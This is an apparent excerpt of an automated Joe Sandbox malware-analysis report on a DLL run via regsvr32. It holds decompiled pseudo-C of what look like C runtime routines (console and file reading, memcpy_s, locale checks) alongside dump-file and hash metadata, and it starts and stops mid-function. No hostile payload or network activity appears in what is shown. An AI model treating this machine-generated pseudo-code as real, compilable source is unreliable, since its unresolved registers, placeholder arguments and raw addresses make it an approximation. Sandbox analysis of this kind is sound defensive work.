                                                                      				_t256 = _t241;
                                                                      				E0000000118003A674(_t241, __rcx);
                                                                      				E0000000118003A674(_t241, _t257);
                                                                      				_t301 = _t256;
                                                                      				if (_t256 != 0) goto 0x800579b7;
                                                                      				E0000000118003BFFC(_t256, _t241);
                                                                      				 *_t241 = 0xc;
                                                                      				E0000000118003C094(_t256, _t241);
                                                                      				 *_t241 = 8;
                                                                      				goto 0x80057af5;
                                                                      				_t28 = _t265 + 1; // 0x1
                                                                      				r8d = _t28;
                                                                      				E00000001180056FF4(_t241, _t256, 0x80073d10);
                                                                      				_t290 = _v88;
                                                                      				r8d = 1;
                                                                      				r11b = _a8;
                                                                      				 *( *((intOrPtr*)(0x80073d10 + _t290 * 8)) + 0x30 + _t299 * 8) = _t241;
                                                                      				_t266 =  *((intOrPtr*)(0x80073d10 + _t290 * 8));
                                                                      				_v72 = _t301;
                                                                      				r10d = 0x180073d1a;
                                                                      				if (( *(_t266 + 0x38 + _t299 * 8) & 0x00000048) == 0) goto 0x80057a7d;
                                                                      				_t141 =  *((intOrPtr*)(_t266 + 0x3a + _t299 * 8));
                                                                      				if (_t141 == r10b) goto 0x80057a7d;
                                                                      				if (_t193 == 0) goto 0x80057a7d;
                                                                      				 *_t301 = _t141;
                                                                      				_t302 = _t301 + _t283;
                                                                      				_t194 = _t193 - 1;
                                                                      				 *((intOrPtr*)( *((intOrPtr*)(0x80073d10 + _t290 * 8)) + 0x3a + _t299 * 8)) = r10b;
                                                                      				if (r11b == 0) goto 0x80057a7d;
                                                                      				_t169 =  *((intOrPtr*)( *((intOrPtr*)(0x80073d10 + _t290 * 8)) + 0x3b + _t299 * 8));
                                                                      				if (_t169 == r10b) goto 0x80057a7d;
                                                                      				if (_t194 == 0) goto 0x80057a7d;
                                                                      				 *_t302 = _t169;
                                                                      				_t303 = _t302 + _t283;
                                                                      				_t195 = _t194 - 1;
                                                                      				 *((intOrPtr*)( *((intOrPtr*)(0x80073d10 + _t290 * 8)) + 0x3b + _t299 * 8)) = r10b;
                                                                      				if (r11b != r8b) goto 0x80057a7d;
                                                                      				_t170 =  *((intOrPtr*)( *((intOrPtr*)(0x80073d10 + _t290 * 8)) + 0x3c + _t299 * 8));
                                                                      				if (_t170 == r10b) goto 0x80057a7d;
                                                                      				if (_t195 == 0) goto 0x80057a7d;
                                                                      				 *_t303 = _t170;
                                                                      				 *((intOrPtr*)( *((intOrPtr*)(0x80073d10 + _t290 * 8)) + 0x3c + _t299 * 8)) = r10b;
                                                                      				if (E00000001180049204(r12d, 0,  *((intOrPtr*)(0x80073d10 + _t290 * 8))) == 0) goto 0x80057b13;
                                                                      				_t248 =  *((intOrPtr*)(0x80073d10 + _v88 * 8));
                                                                      				if ( *((char*)(_t248 + 0x38 + _t299 * 8)) >= 0) goto 0x80057b13;
                                                                      				if (GetConsoleMode(??, ??) == 0) goto 0x80057b13;
                                                                      				if (_a8 != 2) goto 0x80057b18;
                                                                      				_v120 = _v120 & 0x00000000;
                                                                      				_t197 = _t195 - 1 >> 1;
                                                                      				r8d = _t197;
                                                                      				if (ReadConsoleW(??, ??, ??, ??, ??) != 0) goto 0x80057b07;
                                                                      				E0000000118003C12C(GetLastError(), ReadConsoleW(??, ??, ??, ??, ??), _t248, _v96);
                                                                      				E0000000118003A674(_t248, _t256);
                                                                      				goto 0x80057c86;
                                                                      				goto 0x80057b54;
                                                                      				_v80 = 0;
                                                                      				_v120 = _v120 & 0x00000000;
                                                                      				r8d = _t197;
                                                                      				if (ReadFile(??, ??, ??, ??, ??) == 0) goto 0x80057c31;
                                                                      				if (_a32 - r13d > 0) goto 0x80057c31;
                                                                      				if ( *((char*)( *((intOrPtr*)(0x80073d10 + _v88 * 8)) + 0x38 + _t299 * 8)) >= 0) goto 0x80057af8;
                                                                      				_t284 = 0x80073d10 + _t248 * 2 + _a32;
                                                                      				if (_a8 == 2) goto 0x80057b9f;
                                                                      				_t272 = _t303 + _t283;
                                                                      				_v120 = _t298 >> 1;
                                                                      				_t151 = E00000001180057D90(_t150, 0, r12d, _t189, _t256, _t272, _t284, _a16);
                                                                      				goto 0x80057af8;
                                                                      				if (_v80 == 0) goto 0x80057c1f;
                                                                      				_t296 = _v72;
                                                                      				_t252 = _t296;
                                                                      				_t294 =  &(_t296[_t284 >> 1]);
                                                                      				if (_t296 - _t294 >= 0) goto 0x80057c12;
                                                                      				r11d = 0xa;
                                                                      				_t174 =  *_t252 & 0x0000ffff;
                                                                      				if (_t174 == 0x1a) goto 0x80057c07;
                                                                      				if (_t174 != 0xd) goto 0x80057bed;
                                                                      				_t286 =  &(_t252[1]);
                                                                      				if (_t286 - _t294 >= 0) goto 0x80057bed;
                                                                      				if ( *_t286 != r11w) goto 0x80057bed;
                                                                      				r8d = 4;
                                                                      				goto 0x80057bf3;
                                                                      				r8d = 2;
                                                                      				 *_t296 = r11w & 0xffffffff;
                                                                      				if (_t252 + _t286 - _t294 < 0) goto 0x80057bc3;
                                                                      				goto 0x80057c12;
                                                                      				_t254 =  *((intOrPtr*)(0x80073d10 + _t272 * 8));
                                                                      				 *(_t254 + 0x38 + _t299 * 8) =  *(_t254 + 0x38 + _t299 * 8) | 0x00000002;
                                                                      				goto 0x80057af8;
                                                                      				E000000011800581D8(_t151, r12d, _t197, _v72,  &(_t296[1]));
                                                                      				goto 0x80057b98;
                                                                      				if (GetLastError() != 5) goto 0x80057c57;
                                                                      				E0000000118003BFFC(GetLastError() - 5, _t254);
                                                                      				 *_t254 = 9;
                                                                      				_t155 = E0000000118003C094(GetLastError() - 5, _t254);
                                                                      				 *_t254 = 5;
                                                                      				goto 0x80057af5;
                                                                      				if (_t155 != 0x6d) goto 0x80057aee;
                                                                      				goto 0x80057af8;
                                                                      				goto 0x80057c86;
                                                                      				E0000000118003C094(_t155 - 0x6d, _t254);
                                                                      				 *_t254 =  *_t254 & 0x00000000;
                                                                      				E0000000118003BFFC(_t155 - 0x6d, _t254);
                                                                      				 *_t254 = 9;
                                                                      				return E0000000118003A794() | 0xffffffff;
                                                                      			}














































                                                                      0x18005784c
                                                                      0x18005784c
                                                                      0x18005784c
                                                                      0x180057866
                                                                      0x18005786d
                                                                      0x18005786f
                                                                      0x180057874
                                                                      0x180057877
                                                                      0x18005787c
                                                                      0x180057882
                                                                      0x180057889
                                                                      0x18005788f
                                                                      0x180057896
                                                                      0x1800578a9
                                                                      0x1800578b2
                                                                      0x1800578b7
                                                                      0x1800578bb
                                                                      0x1800578c0
                                                                      0x1800578c4
                                                                      0x1800578d0
                                                                      0x1800578dd
                                                                      0x1800578df
                                                                      0x1800578e4
                                                                      0x1800578e7
                                                                      0x1800578ec
                                                                      0x1800578f2
                                                                      0x1800578fa
                                                                      0x180057902
                                                                      0x180057908
                                                                      0x18005790b
                                                                      0x18005790d
                                                                      0x180057915
                                                                      0x18005791d
                                                                      0x180057922
                                                                      0x18005792a
                                                                      0x18005792a
                                                                      0x180057931
                                                                      0x180057936
                                                                      0x180057940
                                                                      0x180057942
                                                                      0x180057947
                                                                      0x180057949
                                                                      0x18005794e
                                                                      0x180057954
                                                                      0x180057959
                                                                      0x180057964
                                                                      0x18005796e
                                                                      0x180057978
                                                                      0x18005797e
                                                                      0x180057985
                                                                      0x180057988
                                                                      0x18005798f
                                                                      0x180057994
                                                                      0x18005799a
                                                                      0x18005799c
                                                                      0x1800579a1
                                                                      0x1800579a7
                                                                      0x1800579ac
                                                                      0x1800579b2
                                                                      0x1800579bc
                                                                      0x1800579bc
                                                                      0x1800579c0
                                                                      0x1800579c5
                                                                      0x1800579ca
                                                                      0x1800579d0
                                                                      0x1800579dc
                                                                      0x1800579e1
                                                                      0x1800579e7
                                                                      0x1800579f2
                                                                      0x1800579f6
                                                                      0x1800579fc
                                                                      0x180057a04
                                                                      0x180057a08
                                                                      0x180057a0a
                                                                      0x180057a18
                                                                      0x180057a1b
                                                                      0x180057a20
                                                                      0x180057a28
                                                                      0x180057a2e
                                                                      0x180057a36
                                                                      0x180057a3a
                                                                      0x180057a3c
                                                                      0x180057a47
                                                                      0x180057a4a
                                                                      0x180057a4c
                                                                      0x180057a54
                                                                      0x180057a5a
                                                                      0x180057a62
                                                                      0x180057a66
                                                                      0x180057a68
                                                                      0x180057a78
                                                                      0x180057a87
                                                                      0x180057a99
                                                                      0x180057aa3
                                                                      0x180057ab7
                                                                      0x180057ac1
                                                                      0x180057ad0
                                                                      0x180057ad9
                                                                      0x180057adb
                                                                      0x180057ae6
                                                                      0x180057af0
                                                                      0x180057afb
                                                                      0x180057b02
                                                                      0x180057b11
                                                                      0x180057b13
                                                                      0x180057b25
                                                                      0x180057b2b
                                                                      0x180057b39
                                                                      0x180057b47
                                                                      0x180057b6b
                                                                      0x180057b75
                                                                      0x180057b78
                                                                      0x180057b88
                                                                      0x180057b8e
                                                                      0x180057b93
                                                                      0x180057b9a
                                                                      0x180057ba7
                                                                      0x180057ba9
                                                                      0x180057bae
                                                                      0x180057bb4
                                                                      0x180057bbb
                                                                      0x180057bbd
                                                                      0x180057bc3
                                                                      0x180057bca
                                                                      0x180057bd0
                                                                      0x180057bd2
                                                                      0x180057bd9
                                                                      0x180057bdf
                                                                      0x180057be5
                                                                      0x180057beb
                                                                      0x180057bed
                                                                      0x180057bf6
                                                                      0x180057c03
                                                                      0x180057c05
                                                                      0x180057c07
                                                                      0x180057c0c
                                                                      0x180057c1a
                                                                      0x180057c27
                                                                      0x180057c2c
                                                                      0x180057c3a
                                                                      0x180057c3c
                                                                      0x180057c41
                                                                      0x180057c47
                                                                      0x180057c4c
                                                                      0x180057c52
                                                                      0x180057c5a
                                                                      0x180057c62
                                                                      0x180057c69
                                                                      0x180057c6b
                                                                      0x180057c70
                                                                      0x180057c73
                                                                      0x180057c78
                                                                      0x180057c95

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3215553584-0
                                                                      • Opcode ID: 0c70aef7f04b1a45fcf078039799cbc3ed16194e01beb34ded2335c41e7221ca
                                                                      • Instruction ID: c550263fc520b067cf7f493615d312b6aceb1db4fa829ae01b0f8a7c45b08b49
                                                                      • Opcode Fuzzy Hash: 0c70aef7f04b1a45fcf078039799cbc3ed16194e01beb34ded2335c41e7221ca
                                                                      • Instruction Fuzzy Hash: F8C1FE7230468C96EBA79B25A4443EE3BA0F789BC4F558105FA4E17392CF7AC69CD701
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 76%
                                                                      			E0000000118004AFD0(void* __ebx, intOrPtr* __rcx, signed int __rdx, signed int __r9, signed int __r11, long long __r13, long long __r14, long long __r15) {
                                                                      				void* __rbx;
                                                                      				void* __rsi;
                                                                      				intOrPtr _t105;
                                                                      				intOrPtr _t106;
                                                                      				intOrPtr _t114;
                                                                      				intOrPtr _t115;
                                                                      				intOrPtr _t117;
                                                                      				intOrPtr _t118;
                                                                      				intOrPtr _t119;
                                                                      				intOrPtr _t128;
                                                                      				intOrPtr _t136;
                                                                      				signed long long _t171;
                                                                      				signed long long _t172;
                                                                      				void* _t173;
                                                                      				signed long long _t174;
                                                                      				intOrPtr* _t176;
                                                                      				signed long long _t178;
                                                                      				signed long long _t182;
                                                                      				signed long long _t189;
                                                                      				void* _t191;
                                                                      				signed long long _t194;
                                                                      				void* _t196;
                                                                      				void* _t197;
                                                                      				signed long long _t198;
                                                                      				long long _t211;
                                                                      				signed long long _t215;
                                                                      				long long _t224;
                                                                      
                                                                      				_t196 = _t197 - 0x2f0;
                                                                      				_t198 = _t197 - 0x3f0;
                                                                      				_t171 =  *0x80072078; // 0xc949cbcab002
                                                                      				_t172 = _t171 ^ _t198;
                                                                      				 *(_t196 + 0x2d0) = _t172;
                                                                      				r12d =  *__rdx;
                                                                      				if (r12d - 1 > 0) goto 0x8004b0c4;
                                                                      				if ( *((intOrPtr*)(__rdx + 4)) != 0) goto 0x8004b037;
                                                                      				r9d = 0;
                                                                      				 *__rcx = r9d;
                                                                      				_t176 = __rcx + 4;
                                                                      				 *((intOrPtr*)(_t196 + 0x100)) = r9d;
                                                                      				E00000001180049864(0x1cc, _t172, _t173, _t176, __rdx, __rcx, _t196 + 0x104, __r9);
                                                                      				goto 0x8004b35e;
                                                                      				if (1 == 1) goto 0x8004b030;
                                                                      				r11d =  *_t176;
                                                                      				if (r11d == 0) goto 0x8004b030;
                                                                      				r9d = 0;
                                                                      				_t174 = _t176 + 4;
                                                                      				r8d = r9d;
                                                                      				r10d = r9d;
                                                                      				_t194 = _t172;
                                                                      				r10d = r10d + 1;
                                                                      				_t189 = __rdx * _t194 + _t172;
                                                                      				if (r10d != r11d) goto 0x8004b060;
                                                                      				if (r8d == 0) goto 0x8004b030;
                                                                      				if ( *__rcx - 0x73 >= 0) goto 0x8004b09f;
                                                                      				 *((intOrPtr*)(__rcx + 4 + _t172 * 4)) = r8d;
                                                                      				 *__rcx =  *__rcx + 1;
                                                                      				goto 0x8004b35e;
                                                                      				 *((intOrPtr*)(_t196 + 0x100)) = r9d;
                                                                      				 *__rcx = r9d;
                                                                      				_t178 = _t174;
                                                                      				E00000001180049864(0x1cc, _t172, _t174, _t178, _t189, __rcx, _t196 + 0x104, __r9);
                                                                      				goto 0x8004b35e;
                                                                      				_t117 =  *_t178;
                                                                      				 *((long long*)(_t198 + 0x430)) = __r13;
                                                                      				if (_t117 - 1 > 0) goto 0x8004b1ac;
                                                                      				_t114 =  *((intOrPtr*)(__rcx + 4));
                                                                      				 *__rcx = r12d;
                                                                      				r9d =  *_t189;
                                                                      				_t220 = __r9 << 2;
                                                                      				E00000001180049864(0x1cc, _t172, _t174, __rcx + 4, _t189, __rcx, _t189 + 4, __r9 << 2);
                                                                      				if (_t114 != 0) goto 0x8004b123;
                                                                      				r9d = 0;
                                                                      				 *((intOrPtr*)(_t196 + 0x100)) = r9d;
                                                                      				 *__rcx = r9d;
                                                                      				E00000001180049864(0x1cc, _t172, _t174, __rcx + 4, _t189, __rcx, _t196 + 0x104, __r9 << 2);
                                                                      				goto 0x8004b356;
                                                                      				if (_t114 == 1) goto 0x8004b11c;
                                                                      				r11d =  *__rcx;
                                                                      				if (r11d == 0) goto 0x8004b11c;
                                                                      				r9d = 0;
                                                                      				r8d = r9d;
                                                                      				r10d = r9d;
                                                                      				r10d = r10d + 1;
                                                                      				_t191 = _t189 * _t174 + _t172;
                                                                      				if (r10d != r11d) goto 0x8004b140;
                                                                      				if (r8d == 0) goto 0x8004b11c;
                                                                      				if ( *__rcx - 0x73 >= 0) goto 0x8004b186;
                                                                      				 *((intOrPtr*)(__rcx + 4 + _t172 * 4)) = r8d;
                                                                      				 *__rcx =  *__rcx + 1;
                                                                      				goto 0x8004b356;
                                                                      				 *((intOrPtr*)(_t196 + 0x100)) = r9d;
                                                                      				 *__rcx = r9d;
                                                                      				_t182 = __rcx + 4;
                                                                      				E00000001180049864(0x1cc, _t172, _t174, _t182, _t191, __rcx, _t196 + 0x104, _t220);
                                                                      				goto 0x8004b356;
                                                                      				 *((long long*)(_t198 + 0x3e8)) = __r14;
                                                                      				 *((long long*)(_t198 + 0x3e0)) = __r15;
                                                                      				_t223 =  >=  ? __rcx : _t191;
                                                                      				_t224 = ( >=  ? __rcx : _t191) + 4;
                                                                      				 *((long long*)(_t198 + 0x28)) = _t224;
                                                                      				_t210 =  >=  ? _t191 : __rcx;
                                                                      				r9d = 0;
                                                                      				_t211 = ( >=  ? _t191 : __rcx) + 4;
                                                                      				_t115 = r9d;
                                                                      				 *((long long*)(_t198 + 0x20)) = _t211;
                                                                      				if (r12d - _t117 >= 0) goto 0x8004b1f2;
                                                                      				r15d = _t117;
                                                                      				goto 0x8004b1f8;
                                                                      				r15d = r12d;
                                                                      				r12d = _t117;
                                                                      				_t118 = r9d;
                                                                      				 *((intOrPtr*)(_t196 + 0x100)) = _t118;
                                                                      				r14d =  *((intOrPtr*)(_t224 + _t172 * 4));
                                                                      				if (r14d != 0) goto 0x8004b22a;
                                                                      				if (_t115 != _t118) goto 0x8004b2f9;
                                                                      				_t41 = _t174 + 1; // 0x1
                                                                      				_t119 = _t41;
                                                                      				 *((intOrPtr*)(_t196 + 0x104 + _t172 * 4)) = r9d;
                                                                      				 *((intOrPtr*)(_t196 + 0x100)) = _t119;
                                                                      				goto 0x8004b2f9;
                                                                      				r10d = r9d;
                                                                      				_t105 = _t115;
                                                                      				if (r15d == 0) goto 0x8004b2ea;
                                                                      				if (_t105 == 0x73) goto 0x8004b29f;
                                                                      				r11d = _t105;
                                                                      				if (_t105 != _t119) goto 0x8004b25d;
                                                                      				_t46 = _t172 + 1; // 0x1
                                                                      				 *((intOrPtr*)(_t196 + 0x104 + __r11 * 4)) = r9d;
                                                                      				 *((intOrPtr*)(_t196 + 0x100)) = _t46;
                                                                      				_t106 = _t105 + 1;
                                                                      				r8d =  *((intOrPtr*)(_t211 + _t182 * 4));
                                                                      				 *((intOrPtr*)(_t196 + 0x104 + __r11 * 4)) = r8d;
                                                                      				if (_t194 + _t172 == r15d) goto 0x8004b29f;
                                                                      				_t215 =  *((intOrPtr*)(_t198 + 0x20));
                                                                      				goto 0x8004b240;
                                                                      				if (r10d == 0) goto 0x8004b2ea;
                                                                      				if (_t106 == 0x73) goto 0x8004b326;
                                                                      				r8d = _t106;
                                                                      				if (_t106 !=  *((intOrPtr*)(_t196 + 0x100))) goto 0x8004b2c1;
                                                                      				_t63 = _t172 + 1; // 0x1
                                                                      				 *((intOrPtr*)(_t196 + 0x104 + _t215 * 4)) = r9d;
                                                                      				 *((intOrPtr*)(_t196 + 0x100)) = _t63;
                                                                      				_t136 =  *((intOrPtr*)(_t196 + 0x104 + _t215 * 4));
                                                                      				 *((intOrPtr*)(_t196 + 0x104 + _t215 * 4)) = _t136;
                                                                      				_t128 =  *((intOrPtr*)(_t196 + 0x100));
                                                                      				r10d = _t136;
                                                                      				if (_t136 != 0) goto 0x8004b2a4;
                                                                      				if (_t106 + 1 == 0x73) goto 0x8004b326;
                                                                      				if (_t115 + 1 != r12d) goto 0x8004b201;
                                                                      				r9d = _t128;
                                                                      				 *__rcx = _t128;
                                                                      				E00000001180049864(0x1cc, _t172, _t174, __rcx + 4, _t191 + _t182 >> 0x20, __rcx, _t196 + 0x104, _t220 << 2);
                                                                      				goto 0x8004b346;
                                                                      				 *((intOrPtr*)(_t198 + 0x30)) = r9d;
                                                                      				 *__rcx = r9d;
                                                                      				r9d = 0;
                                                                      				E00000001180049864(0x1cc, _t172, _t174, __rcx + 4, _t191 + _t182 >> 0x20, __rcx, _t198 + 0x34, _t220 << 2);
                                                                      				return E00000001180002FB0(0, _t128,  *(_t196 + 0x2d0) ^ _t198);
                                                                      			}






























                                                                      0x18004afd7
                                                                      0x18004afdf
                                                                      0x18004afe6
                                                                      0x18004afed
                                                                      0x18004aff0
                                                                      0x18004aff7
                                                                      0x18004b001
                                                                      0x18004b00c
                                                                      0x18004b00e
                                                                      0x18004b018
                                                                      0x18004b020
                                                                      0x18004b024
                                                                      0x18004b02b
                                                                      0x18004b032
                                                                      0x18004b03a
                                                                      0x18004b03c
                                                                      0x18004b042
                                                                      0x18004b044
                                                                      0x18004b047
                                                                      0x18004b04b
                                                                      0x18004b04e
                                                                      0x18004b051
                                                                      0x18004b063
                                                                      0x18004b074
                                                                      0x18004b083
                                                                      0x18004b088
                                                                      0x18004b08f
                                                                      0x18004b091
                                                                      0x18004b098
                                                                      0x18004b09a
                                                                      0x18004b0a6
                                                                      0x18004b0b2
                                                                      0x18004b0b5
                                                                      0x18004b0b8
                                                                      0x18004b0bf
                                                                      0x18004b0c4
                                                                      0x18004b0c6
                                                                      0x18004b0d1
                                                                      0x18004b0d7
                                                                      0x18004b0de
                                                                      0x18004b0e5
                                                                      0x18004b0ed
                                                                      0x18004b0f1
                                                                      0x18004b0f8
                                                                      0x18004b0fa
                                                                      0x18004b109
                                                                      0x18004b114
                                                                      0x18004b117
                                                                      0x18004b11e
                                                                      0x18004b126
                                                                      0x18004b128
                                                                      0x18004b12e
                                                                      0x18004b130
                                                                      0x18004b133
                                                                      0x18004b136
                                                                      0x18004b143
                                                                      0x18004b159
                                                                      0x18004b16a
                                                                      0x18004b16f
                                                                      0x18004b176
                                                                      0x18004b178
                                                                      0x18004b17f
                                                                      0x18004b181
                                                                      0x18004b18d
                                                                      0x18004b199
                                                                      0x18004b19c
                                                                      0x18004b1a0
                                                                      0x18004b1a7
                                                                      0x18004b1af
                                                                      0x18004b1ba
                                                                      0x18004b1c2
                                                                      0x18004b1c9
                                                                      0x18004b1d0
                                                                      0x18004b1d5
                                                                      0x18004b1d9
                                                                      0x18004b1dc
                                                                      0x18004b1e0
                                                                      0x18004b1e3
                                                                      0x18004b1eb
                                                                      0x18004b1ed
                                                                      0x18004b1f0
                                                                      0x18004b1f2
                                                                      0x18004b1f5
                                                                      0x18004b1f8
                                                                      0x18004b1fb
                                                                      0x18004b203
                                                                      0x18004b20a
                                                                      0x18004b20e
                                                                      0x18004b214
                                                                      0x18004b214
                                                                      0x18004b217
                                                                      0x18004b21f
                                                                      0x18004b225
                                                                      0x18004b22a
                                                                      0x18004b22d
                                                                      0x18004b232
                                                                      0x18004b243
                                                                      0x18004b245
                                                                      0x18004b24a
                                                                      0x18004b24c
                                                                      0x18004b24f
                                                                      0x18004b257
                                                                      0x18004b260
                                                                      0x18004b262
                                                                      0x18004b281
                                                                      0x18004b296
                                                                      0x18004b298
                                                                      0x18004b29d
                                                                      0x18004b2a2
                                                                      0x18004b2a7
                                                                      0x18004b2a9
                                                                      0x18004b2ae
                                                                      0x18004b2b0
                                                                      0x18004b2b3
                                                                      0x18004b2bb
                                                                      0x18004b2c1
                                                                      0x18004b2d1
                                                                      0x18004b2d9
                                                                      0x18004b2e3
                                                                      0x18004b2e8
                                                                      0x18004b2ed
                                                                      0x18004b2fe
                                                                      0x18004b304
                                                                      0x18004b30e
                                                                      0x18004b31d
                                                                      0x18004b324
                                                                      0x18004b326
                                                                      0x18004b32f
                                                                      0x18004b337
                                                                      0x18004b33f
                                                                      0x18004b37a

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: memcpy_s
                                                                      • String ID:
                                                                      • API String ID: 1502251526-0
                                                                      • Opcode ID: 518c81ab9717c4346f1f1247599aec4191a52d44ede635914535b263540162c4
                                                                      • Instruction ID: c7e5669bf55c414024c44e7fa11029b2d90404ffd0308117a4a5cd5c7f133b42
                                                                      • Opcode Fuzzy Hash: 518c81ab9717c4346f1f1247599aec4191a52d44ede635914535b263540162c4
                                                                      • Instruction Fuzzy Hash: 55A18CB2600A848BE7BA8F55E590BED77A0F3697CCF41D115EB4A97B84DB34CA48C704
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 55%
                                                                      			E00000001180050A74(void* __ecx, void* __edx, void* __esi, long long __rcx, intOrPtr* __rdx, void* __r8, void* __r9, void* __r10) {
                                                                      				signed int _v72;
                                                                      				int _v80;
                                                                      				int _v84;
                                                                      				signed int _v88;
                                                                      				void* __rbx;
                                                                      				void* __rsi;
                                                                      				void* __rbp;
                                                                      				int _t59;
                                                                      				intOrPtr _t60;
                                                                      				void* _t72;
                                                                      				intOrPtr _t81;
                                                                      				intOrPtr _t83;
                                                                      				void* _t90;
                                                                      				signed long long _t116;
                                                                      				signed long long _t117;
                                                                      				intOrPtr* _t118;
                                                                      				intOrPtr* _t119;
                                                                      				intOrPtr* _t120;
                                                                      				intOrPtr* _t121;
                                                                      				intOrPtr* _t122;
                                                                      				void* _t125;
                                                                      				intOrPtr* _t126;
                                                                      				signed long long _t134;
                                                                      				signed long long _t136;
                                                                      				void* _t147;
                                                                      				void* _t148;
                                                                      				signed long long _t149;
                                                                      				void* _t151;
                                                                      				void* _t159;
                                                                      				long long _t161;
                                                                      				intOrPtr* _t163;
                                                                      
                                                                      				_t159 = __r9;
                                                                      				_t141 = __rdx;
                                                                      				_t72 = __ecx;
                                                                      				_t116 =  *0x80072078; // 0xc949cbcab002
                                                                      				_t117 = _t116 ^ _t151 - 0x00000040;
                                                                      				_v72 = _t117;
                                                                      				_t147 = __r8;
                                                                      				_t163 = __rdx;
                                                                      				_t161 = __rcx;
                                                                      				E00000001180038680(_t117, _t125, __rdx, _t148);
                                                                      				_t149 = _t117;
                                                                      				_v88 = _t117;
                                                                      				_v80 = 0;
                                                                      				E00000001180038680(_t117, _t125, _t141, _t149);
                                                                      				r12d = 0;
                                                                      				_t5 = _t149 + 0xa0; // 0xa0
                                                                      				_t126 = _t5;
                                                                      				 *((long long*)(_t117 + 0x3a0)) =  &_v88;
                                                                      				_t118 = _t161 + 0x80;
                                                                      				 *((long long*)(_t149 + 0x98)) = _t161;
                                                                      				 *_t126 = _t118;
                                                                      				if (_t118 == 0) goto 0x80050afb;
                                                                      				if ( *_t118 == r12w) goto 0x80050afb;
                                                                      				_t81 =  *0x80064050; // 0x17
                                                                      				E00000001180050CF4(_t81 - 1, _t126, 0x80063ee0, _t149, _t151, _t126);
                                                                      				_v88 = r12d;
                                                                      				_t119 =  *((intOrPtr*)(_t149 + 0x98));
                                                                      				if (_t119 == 0) goto 0x80050b84;
                                                                      				if ( *_t119 == r12w) goto 0x80050b84;
                                                                      				_t120 =  *_t126;
                                                                      				if (_t120 == 0) goto 0x80050b2a;
                                                                      				if ( *_t120 == r12w) goto 0x80050b2a;
                                                                      				E00000001180050D74(_t72, _t81 - 1, _t120, _t126,  &_v88, _t141, _t126);
                                                                      				goto 0x80050b33;
                                                                      				E00000001180051090(_t72, _t81 - 1, _t120, _t126,  &_v88, _t141, _t126);
                                                                      				if (_v88 != r12d) goto 0x80050bfa;
                                                                      				_t83 =  *0x80063ed0; // 0x41
                                                                      				_t14 = _t149 + 0x98; // 0x98
                                                                      				if (E00000001180050CF4(_t83 - 1, _t126, 0x80063ac0, _t149, _t151, _t14) == 0) goto 0x80050bf0;
                                                                      				_t121 =  *_t126;
                                                                      				if (_t121 == 0) goto 0x80050b79;
                                                                      				if ( *_t121 == r12w) goto 0x80050b79;
                                                                      				E00000001180050D74(_t72, _t83 - 1, _t121, _t126,  &_v88, _t141, _t14);
                                                                      				goto 0x80050bf0;
                                                                      				_t134 =  &_v88;
                                                                      				E00000001180051090(_t72, _t83 - 1, _t121, _t126, _t134, _t141, _t14);
                                                                      				goto 0x80050bf0;
                                                                      				_t122 =  *_t126;
                                                                      				if (_t122 == 0) goto 0x80050bdd;
                                                                      				if ( *_t122 == r12w) goto 0x80050bdd;
                                                                      				E00000001180038680(_t122, _t126, _t141, _t149);
                                                                      				_t136 = (_t134 | 0xffffffff) + 1;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(_t122 + 0xa0)) + _t136 * 2)) != r12w) goto 0x80050ba5;
                                                                      				 *(_t122 + 0xb4) = r12d & 0xffffff00 | _t136 == 0x00000003;
                                                                      				EnumSystemLocalesW(??, ??);
                                                                      				if ((_v88 & 0x00000004) != 0) goto 0x80050bf0;
                                                                      				_v88 = r12d;
                                                                      				goto 0x80050bf0;
                                                                      				_v88 = 0x104;
                                                                      				_t59 = GetUserDefaultLCID();
                                                                      				_v80 = _t59;
                                                                      				_v84 = _t59;
                                                                      				if (_v88 == r12d) goto 0x80050cd5;
                                                                      				asm("dec eax");
                                                                      				_t60 = E0000000118005139C(_t126, E00000001180051290 & _t161 + 0x00000100,  &_v88, _t149);
                                                                      				if (_t60 == 0) goto 0x80050cd5;
                                                                      				if (IsValidCodePage(??) == 0) goto 0x80050cd5;
                                                                      				if (IsValidLocale(??, ??) == 0) goto 0x80050cd5;
                                                                      				if (_t163 == 0) goto 0x80050c4c;
                                                                      				 *_t163 = _t60;
                                                                      				_t35 = _t149 + 0x2f0; // 0x2f0
                                                                      				r9d = 0;
                                                                      				_t36 = _t159 + 0x55; // 0x55
